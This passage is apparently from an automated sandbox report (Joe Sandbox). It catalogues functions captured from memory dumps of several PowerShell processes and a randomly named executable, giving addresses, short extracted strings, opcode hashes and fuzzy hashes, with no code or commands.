Opcode Fuzzy Hash: 749563f419819850808ac2b7323902100547ee51120455f12beae56beba39b1f
Instruction Fuzzy Hash: F301677115CB0D8FD744EF0CE451AB5B7E0FB95364F10056DE58AC3661DA36E882CB45

Function 00007FFAAC65414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2511201831.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffaac650000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51f5b6043e0f82a35d0669c7f88ae01ab06a18875b261606dbeffe2eef191ee6
Instruction ID: 385ec90054a036e6d5f2a5a70f95f0abaf044e9a75f89d9ec4f173268e8e308b
Opcode Fuzzy Hash: 51f5b6043e0f82a35d0669c7f88ae01ab06a18875b261606dbeffe2eef191ee6
Instruction Fuzzy Hash: 28F09A32A4D5088FE769EB5CE4458A877E0EF55320B2190FAE05DC75A3CE25EC45C780

Function 00007FFAAC654400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2511201831.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffaac650000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e18fa7b76d0c06402f587efd2377e5a20668f99f011e42b50fea2fee2c6266bb
Instruction ID: 67b1750df67e56bcfd51a0679768562f7229a144de909be0f45c4c9286d202a8
Opcode Fuzzy Hash: e18fa7b76d0c06402f587efd2377e5a20668f99f011e42b50fea2fee2c6266bb
Instruction Fuzzy Hash: 5EF0E232A8D5488FE759EB1CE0458A877E0FF05320B6190FAE04DCB463DE25EC44C790

Function 00007FFAAC6541D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2511201831.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffaac650000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: 73551cc810c09e82e539eb5e1c4e7a3fbd698574b07bad01e3e611af36010216
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: DBE01A31B4C808CFEA79DB0CE0409B973E1EB99321B2161BBD14EC7561CA22EC559BC0

Non-executed Functions

Function 00007FFAAC588BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON

Download Yara Rule

Strings

L_^6, xrefs: 00007FFAAC588BFA
L_^I, xrefs: 00007FFAAC588C72
L_^<, xrefs: 00007FFAAC588C2A
L_^F, xrefs: 00007FFAAC588C6A
L_^J, xrefs: 00007FFAAC588C7A

Memory Dump Source

Source File: 0000000C.00000002.2501516430.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffaac580000_powershell.jbxd

Similarity

API ID:
String ID: L_^6$L_^<$L_^F$L_^I$L_^J
API String ID: 0-1031638419
Opcode ID: a54de3a7bcd74ae262807ef1770589f700c42625eb989c2a9c45b9979aeefd82
Instruction ID: 49bc5aa737043e8c7eb89f430a3889cf18853d7f13f286a37abe77a902f02d8a
Opcode Fuzzy Hash: a54de3a7bcd74ae262807ef1770589f700c42625eb989c2a9c45b9979aeefd82
Instruction Fuzzy Hash: 9221EFB77484165F920276BEB8019EC7394DB9827634891B3D358CB623DE14B08B8ED0

Function 00007FFAAC588995 Relevance: 5.2, Strings: 4, Instructions: 157COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFAAC588A7A
L_^, xrefs: 00007FFAAC588A2A
L_^, xrefs: 00007FFAAC5889C9
L_^, xrefs: 00007FFAAC588AC2

Memory Dump Source

Source File: 0000000C.00000002.2501516430.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffaac580000_powershell.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^$L_^
API String ID: 0-2357752022
Opcode ID: 266fc3b0a43f60fc5477e833f2047b56fbab7ff41f129f09e93bace930c8dede
Instruction ID: 148d5fae116ce5ef486ea707b966bd16aa0679e8895353e81e5cb51a0e75671e
Opcode Fuzzy Hash: 266fc3b0a43f60fc5477e833f2047b56fbab7ff41f129f09e93bace930c8dede
Instruction Fuzzy Hash: 11516FA294FBC38BF65A436458660B56FE4EF13324F0D91F6E09C4A0D3E91DA94A9381

Analysis Process: powershell.exePID: 7856, Parent PID: 7700COMMON

Executed Functions

Function 00007FFAAC556435 Relevance: 2.0, Strings: 1, Instructions: 743COMMON

Download Yara Rule

Strings

6, xrefs: 00007FFAAC556902

Memory Dump Source

Source File: 0000000E.00000002.2507066715.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaac550000_powershell.jbxd

Similarity

API ID:
String ID: 6
API String ID: 0-1452363761
Opcode ID: 9c3a3372bf58c7d71dcabb1bf674883960aa83878b4fdc7cc6ed7f8e4ba9f261
Instruction ID: de948dda01b926eb1ce40033bfd78a011715af20a4417cee743e8ee600fc5abe
Opcode Fuzzy Hash: 9c3a3372bf58c7d71dcabb1bf674883960aa83878b4fdc7cc6ed7f8e4ba9f261
Instruction Fuzzy Hash: D3D16C74A18A8E8FEF84DB58C454AA97BF1FF69300F14816AE40DD7296CE35E845CBC1

Function 00007FFAAC626605 Relevance: .4, Instructions: 437COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2529538283.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaac620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d49a9b60b4f2204ababf793b5c20c58483ddec2abcaa3ef286348749ed6738e
Instruction ID: ba2ab9cb5a717fca6256939186c9602f9e59c99e17d04904f4a226a7deeda2f9
Opcode Fuzzy Hash: 6d49a9b60b4f2204ababf793b5c20c58483ddec2abcaa3ef286348749ed6738e
Instruction Fuzzy Hash: 38D13771D0EA8A8FF756DB6898159B9BBA0EF66310B0451FED44DC70D3EA18DC09C391

Function 00007FFAAC559738 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2507066715.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaac550000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba0bd51354afc0f57ac32cee997cef0b6927b6a9f1821c9270eae3229ebef1cd
Instruction ID: 816fca0f2f4ad2950a9e1a6b53821b90bfe87227e9d16e869ecde8a4ccb148ab
Opcode Fuzzy Hash: ba0bd51354afc0f57ac32cee997cef0b6927b6a9f1821c9270eae3229ebef1cd
Instruction Fuzzy Hash: C1412C7191DB899FE718AF5CAC065A97BE1FB96310F14817FF04D83282DA25E81687C2

Function 00007FFAAC43ED40 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2495663654.00007FFAAC43D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaac43d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d628ae702b7e741ca74bb98c12dd57633c22883d4dd6c57314c80a1b58b0b30b
Instruction ID: f02556415c2349719909d5a869b09dfd6786faf47ecacb80ca9df8399f1f5bd8
Opcode Fuzzy Hash: d628ae702b7e741ca74bb98c12dd57633c22883d4dd6c57314c80a1b58b0b30b
Instruction Fuzzy Hash: E141067141EBC48FE7579B2898459523FF0EF97324B1905DFD088CB1A3D629E84AC792

Function 00007FFAAC55A49C Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2507066715.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaac550000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 584d5bc2e692fe4bf3547aedc91702761fd54a3e0d9a8a509513b56a025d34d7
Instruction ID: 99e14fc26ac2e7ade9dc9cc544655119c0028a6e1ce4d584925adab778fb28c5
Opcode Fuzzy Hash: 584d5bc2e692fe4bf3547aedc91702761fd54a3e0d9a8a509513b56a025d34d7
Instruction Fuzzy Hash: 2321373190C64C8FEB599B6C884A6F67BE0EB97330F00426FD049C3166DA75A45BCB91

Function 00007FFAAC5533B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2507066715.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaac550000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8607e7f85c2bb2a5020c6518f23c7702bb5abb07c74586bc1031166d3bd47eca
Instruction ID: 87c92194a9c8ca92cf7d347763fdbff49970a13b3841e7c388c0eef808e905fe
Opcode Fuzzy Hash: 8607e7f85c2bb2a5020c6518f23c7702bb5abb07c74586bc1031166d3bd47eca
Instruction Fuzzy Hash: C701677115CB0D8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E882CB45

Function 00007FFAAC62414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2529538283.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaac620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d40d0001dfbad5b27b612d5cc959cb3e6e4e72fbac97dd3c922d7ada1075b527
Instruction ID: 9e142046767cd15c8166be7a8884960ea1256acfb8cb775b405053e33d7a9aff
Opcode Fuzzy Hash: d40d0001dfbad5b27b612d5cc959cb3e6e4e72fbac97dd3c922d7ada1075b527
Instruction Fuzzy Hash: 86F0BE32A0D5048FE759EB5CE4498B8B7E0EF5532071190BAE05DC75A3DE25EC45C780

Function 00007FFAAC624400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2529538283.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaac620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36dd9203ec2abfe46b4009b5a0ee3d4ebf1b9c5ac0183970101288fd33ca6e3d
Instruction ID: 42ff0e9889862176b50c4e4c6457dec23d82ca69ed8822d5649c19db6694f6a3
Opcode Fuzzy Hash: 36dd9203ec2abfe46b4009b5a0ee3d4ebf1b9c5ac0183970101288fd33ca6e3d
Instruction Fuzzy Hash: D5F0BE32A0D5448FE759EB1CE0458E8BBE0EF05320B51A0F6E04DCB463EA25EC44C790

Function 00007FFAAC6241D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2529538283.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaac620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: bc8c278daae929def9611b568d391ac05cb36f07f469423249f3519339791733
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: 24E01A31B0C809CFEA69DB0CE0449B9B3E1EB9936171161B7D14EC7561DA22EC559BC0

Non-executed Functions

Function 00007FFAAC5585FA Relevance: 5.2, Strings: 4, Instructions: 162COMMON

Download Yara Rule

Strings

O_^, xrefs: 00007FFAAC5586C9
O_^, xrefs: 00007FFAAC55867A
O_^, xrefs: 00007FFAAC5585FA
O_^, xrefs: 00007FFAAC55866A

Memory Dump Source

Source File: 0000000E.00000002.2507066715.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaac550000_powershell.jbxd

Similarity

API ID:
String ID: O_^$O_^$O_^$O_^
API String ID: 0-109995703
Opcode ID: 13ef5d4ab1ffc2b4400616bd8c3f4523edcec4f8692a2c02cdf8646ee65736cd
Instruction ID: bda8ee58ac2067c5f1c834c6078c9d891ce945a4c80e0b2c75e50ce80fca5927
Opcode Fuzzy Hash: 13ef5d4ab1ffc2b4400616bd8c3f4523edcec4f8692a2c02cdf8646ee65736cd
Instruction Fuzzy Hash: 4851A692D8F7C78FF359476914591A52FE4AF63254F0D40FAE08D8B1D3EC1AA80E46D2

Function 00007FFAAC558BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

O_^F, xrefs: 00007FFAAC558C7A
O_^7, xrefs: 00007FFAAC558C12
O_^4, xrefs: 00007FFAAC558BFA
O_^J, xrefs: 00007FFAAC558C8A

Memory Dump Source

Source File: 0000000E.00000002.2507066715.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaac550000_powershell.jbxd

Similarity

API ID:
String ID: O_^4$O_^7$O_^F$O_^J
API String ID: 0-875994666
Opcode ID: 2e885493dd975bc32d340c5768cef525a19cc6b18a019490f26335b263fa7f1c
Instruction ID: c8459bde14b5f22ca8587999488443d1d304aeefbe1c251420472257b9d3983f
Opcode Fuzzy Hash: 2e885493dd975bc32d340c5768cef525a19cc6b18a019490f26335b263fa7f1c
Instruction Fuzzy Hash: F621FFBB6180268ED2027B7DB814DE93790CFD823674542B2E19ECE353ED1470CA8E90

Analysis Process: powershell.exePID: 7904, Parent PID: 7700COMMON

Executed Functions

Function 00007FFAAC656605 Relevance: 1.7, Strings: 1, Instructions: 445COMMON

Download Yara Rule

Strings

X7+, xrefs: 00007FFAAC6567FD

Memory Dump Source

Source File: 00000010.00000002.2562358343.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffaac650000_powershell.jbxd

Similarity

API ID:
String ID: X7+
API String ID: 0-4292316761
Opcode ID: adf48b21ff5e3c76ea68c822407a18dfe3fd4cae52e4beb7f0ffaff09c5fe805
Instruction ID: f868f55b90b11b28167940af23a1dfbc7cdb99eefe2bcfd5a14b37f638ee8f29
Opcode Fuzzy Hash: adf48b21ff5e3c76ea68c822407a18dfe3fd4cae52e4beb7f0ffaff09c5fe805
Instruction Fuzzy Hash: 70D1676690EB8E8FF756D72888155B97FE0EF56210B2851FEE04EC71D3DA28D809C391

Function 00007FFAAC58A3AC Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2553079732.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffaac580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d42cf9ce9f38ed6f845607773d22025d02e104fc07b678b22882d43d1a115811
Instruction ID: 68f32f9a9e35f7b0dede9dbe6d9aba0331af0c61b0cc20a84735fbaac78cc763
Opcode Fuzzy Hash: d42cf9ce9f38ed6f845607773d22025d02e104fc07b678b22882d43d1a115811
Instruction Fuzzy Hash: 58812A3091CA4D8FDB59DB6C98496F97BE0EF56321F04426FD049C32A2DA74A846C791

Function 00007FFAAC58A80C Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2553079732.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffaac580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5867e82b627e084c25db54f9d538f73b9deaaae0d01d8e73e8e0d3ff69c4652
Instruction ID: 1174a37723b14f80b13a0b7251949fad8d0874410235d35b91a697ffc860a3a2
Opcode Fuzzy Hash: a5867e82b627e084c25db54f9d538f73b9deaaae0d01d8e73e8e0d3ff69c4652
Instruction Fuzzy Hash: 9251267190DB868FE349DB6888954747BE0EF56314B1881BEE48EC7193ED29E80BC791

Function 00007FFAAC589738 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2553079732.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffaac580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14a7c90e9710a7ce76b920882d9f5a8c8fb200f19b2216f33c6873aa42dd2814
Instruction ID: f4684065c5f456bb0746e7a34a502f1b937ced11d9de6ca04c63eedc6c2ae30a
Opcode Fuzzy Hash: 14a7c90e9710a7ce76b920882d9f5a8c8fb200f19b2216f33c6873aa42dd2814
Instruction Fuzzy Hash: 18412071A0DB495FEB089F5CAC465B97BE1FB96310F14417FE04CC3242DA20E91987C2

Function 00007FFAAC46E7E0 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2545267609.00007FFAAC46D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffaac46d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f06013f6553ad84968f298e91994a582fa4acd4e2ef3bbe45c3fa54c1e20ba7
Instruction ID: 14b57073be2f2c8cc97008e1c8ee820fd50c338b01d7203c805badfa22a187b7
Opcode Fuzzy Hash: 5f06013f6553ad84968f298e91994a582fa4acd4e2ef3bbe45c3fa54c1e20ba7
Instruction Fuzzy Hash: B941167080EBC48FE7568B3998559527FF0EF57224B1901EFE088CB1A7D625E84AC7D2

Function 00007FFAAC58A0FB Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2553079732.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffaac580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a02b1573c0b2e31f7340fdc16ce2fc2683683fcd264e422f593568e7581b8ec8
Instruction ID: 46374cad7941ea882d3de050237edbc968580484a9b6ab3aa06b5e070143708c
Opcode Fuzzy Hash: a02b1573c0b2e31f7340fdc16ce2fc2683683fcd264e422f593568e7581b8ec8
Instruction Fuzzy Hash: 0921A7A6D8FE87CBFB559B5858561F43BA4EF22310F048076E44C57093EE19E60E57C2

Function 00007FFAAC5833B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2553079732.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffaac580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 749563f419819850808ac2b7323902100547ee51120455f12beae56beba39b1f
Instruction ID: 1ce3309a3258698c77acd1a934b1dd5e9fd8776a9a3446389a18c2b90e62ff75
Opcode Fuzzy Hash: 749563f419819850808ac2b7323902100547ee51120455f12beae56beba39b1f
Instruction Fuzzy Hash: F301677115CB0D8FD744EF0CE451AB5B7E0FB95364F10056DE58AC3661DA36E882CB45

Function 00007FFAAC65414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2562358343.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffaac650000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51f5b6043e0f82a35d0669c7f88ae01ab06a18875b261606dbeffe2eef191ee6
Instruction ID: 385ec90054a036e6d5f2a5a70f95f0abaf044e9a75f89d9ec4f173268e8e308b
Opcode Fuzzy Hash: 51f5b6043e0f82a35d0669c7f88ae01ab06a18875b261606dbeffe2eef191ee6
Instruction Fuzzy Hash: 28F09A32A4D5088FE769EB5CE4458A877E0EF55320B2190FAE05DC75A3CE25EC45C780

Function 00007FFAAC654400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2562358343.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffaac650000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e18fa7b76d0c06402f587efd2377e5a20668f99f011e42b50fea2fee2c6266bb
Instruction ID: 67b1750df67e56bcfd51a0679768562f7229a144de909be0f45c4c9286d202a8
Opcode Fuzzy Hash: e18fa7b76d0c06402f587efd2377e5a20668f99f011e42b50fea2fee2c6266bb
Instruction Fuzzy Hash: 5EF0E232A8D5488FE759EB1CE0458A877E0FF05320B6190FAE04DCB463DE25EC44C790

Function 00007FFAAC6541D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2562358343.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffaac650000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: 73551cc810c09e82e539eb5e1c4e7a3fbd698574b07bad01e3e611af36010216
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: DBE01A31B4C808CFEA79DB0CE0409B973E1EB99321B2161BBD14EC7561CA22EC559BC0

Non-executed Functions

Function 00007FFAAC5885FA Relevance: 5.2, Strings: 4, Instructions: 159COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFAAC5885FA
L_^, xrefs: 00007FFAAC5886C9
L_^, xrefs: 00007FFAAC58866A
L_^, xrefs: 00007FFAAC58867A

Memory Dump Source

Source File: 00000010.00000002.2553079732.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffaac580000_powershell.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^$L_^
API String ID: 0-3303188664
Opcode ID: 3d477d6b754ee4168c2c4e384cc4d55bc25927bacaa3d12c0b61816a04ddc322
Instruction ID: 52eec86d548fed5bcad4aa2cabae12e1d40ea1d5a2755c51e5eb97f7fe514475
Opcode Fuzzy Hash: 3d477d6b754ee4168c2c4e384cc4d55bc25927bacaa3d12c0b61816a04ddc322
Instruction Fuzzy Hash: 0851C192C4E7C38BF65A476A18551B52FE4EF23360F0980F6E08D8B097ED19AA0E57C1

Function 00007FFAAC588BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

L_^J, xrefs: 00007FFAAC588C8A
L_^4, xrefs: 00007FFAAC588BFA
L_^7, xrefs: 00007FFAAC588C12
L_^F, xrefs: 00007FFAAC588C7A

Memory Dump Source

Source File: 00000010.00000002.2553079732.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffaac580000_powershell.jbxd

Similarity

API ID:
String ID: L_^4$L_^7$L_^F$L_^J
API String ID: 0-3225005683
Opcode ID: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
Instruction ID: 4176c8602b69aee7968f290b64ec331f5eed73d9827c1be3728d877b46de185e
Opcode Fuzzy Hash: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
Instruction Fuzzy Hash: 952101B76080264ED2027BBDB815DFD3760CB9823434592B2D299CB223EE1470CA8EE0

Analysis Process: mOBsSQwwQhAobhYfNDABCsnt.exePID: 576, Parent PID: 6592COMMON

Execution Graph

Execution Coverage:	5.9%
Dynamic/Decrypted Code Coverage:	81.2%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFAACC88B32 Relevance: 4.1, Strings: 3, Instructions: 328
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAACC88E92
r6, xrefs: 00007FFAACC88B93
r6, xrefs: 00007FFAACC88BE3

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID: r6$r6$r6
API String ID: 0-701349563
Opcode ID: c89ba1494770b6a59308510d36b6686758da62eb22b10a8814f0e2703bfe8b12
Instruction ID: 312956a056fa1d6e62f218718c2e390ec0d1e71e0d40a5376ea4f870a8056d1d
Opcode Fuzzy Hash: c89ba1494770b6a59308510d36b6686758da62eb22b10a8814f0e2703bfe8b12
Instruction Fuzzy Hash: 93C19E70909A469FE789DF28C4906B5B7E1FF56300F44817AD04EC7E86CB28FA55CB90

Function 00007FFAACC8E2D2 Relevance: 4.1, Strings: 3, Instructions: 325
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAACC8E333
r6, xrefs: 00007FFAACC8E383
r6, xrefs: 00007FFAACC8E632

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID: r6$r6$r6
API String ID: 0-701349563
Opcode ID: 324a8a9b70cdc8e3e3575ada9404cd771ab03c29ff6832577f4d784f33fbb74e
Instruction ID: 5da52f38b543d8b14568bebc040141914f15c3f7dd44736e80ad62a0568ffaa4
Opcode Fuzzy Hash: 324a8a9b70cdc8e3e3575ada9404cd771ab03c29ff6832577f4d784f33fbb74e
Instruction Fuzzy Hash: 2AC1D170509A468FE789DF68C0906B6B7A1FF4A300F5481BDD05EC7A86DB38F9558BC0

Function 00007FFAACC89610 Relevance: 4.0, Strings: 3, Instructions: 225
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

b4, xrefs: 00007FFAACC89712
r6, xrefs: 00007FFAACC897F3
r6, xrefs: 00007FFAACC89772

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID: b4$r6$r6
API String ID: 0-3183416175
Opcode ID: e5ff455900b2ce66a76449f0ac4f35859c1b597d065ea68e7f62ea838858959b
Instruction ID: 74ed0249a0b56033b3b2755af5723d4e342ba1c61daf49759b2411bfd99b8489
Opcode Fuzzy Hash: e5ff455900b2ce66a76449f0ac4f35859c1b597d065ea68e7f62ea838858959b
Instruction Fuzzy Hash: AD81B971D096498FEBD8DF688455BF97BA1FF56300F0081B9D00ED7292DE389A488B81

Function 00007FFAACC8EA1F Relevance: 2.7, Strings: 2, Instructions: 220
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

b4, xrefs: 00007FFAACC8EEB2
T^H, xrefs: 00007FFAACC8EEF3

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID: T^H$b4
API String ID: 0-1226007302
Opcode ID: 8f9bbfc8b648a6b01b545822aca9ae2e86063fbef7540c4d7e333f2ef226ffe5
Instruction ID: 5acb4a49a13793854fb16971ab318e66283789985b055230b4d6851537193e88
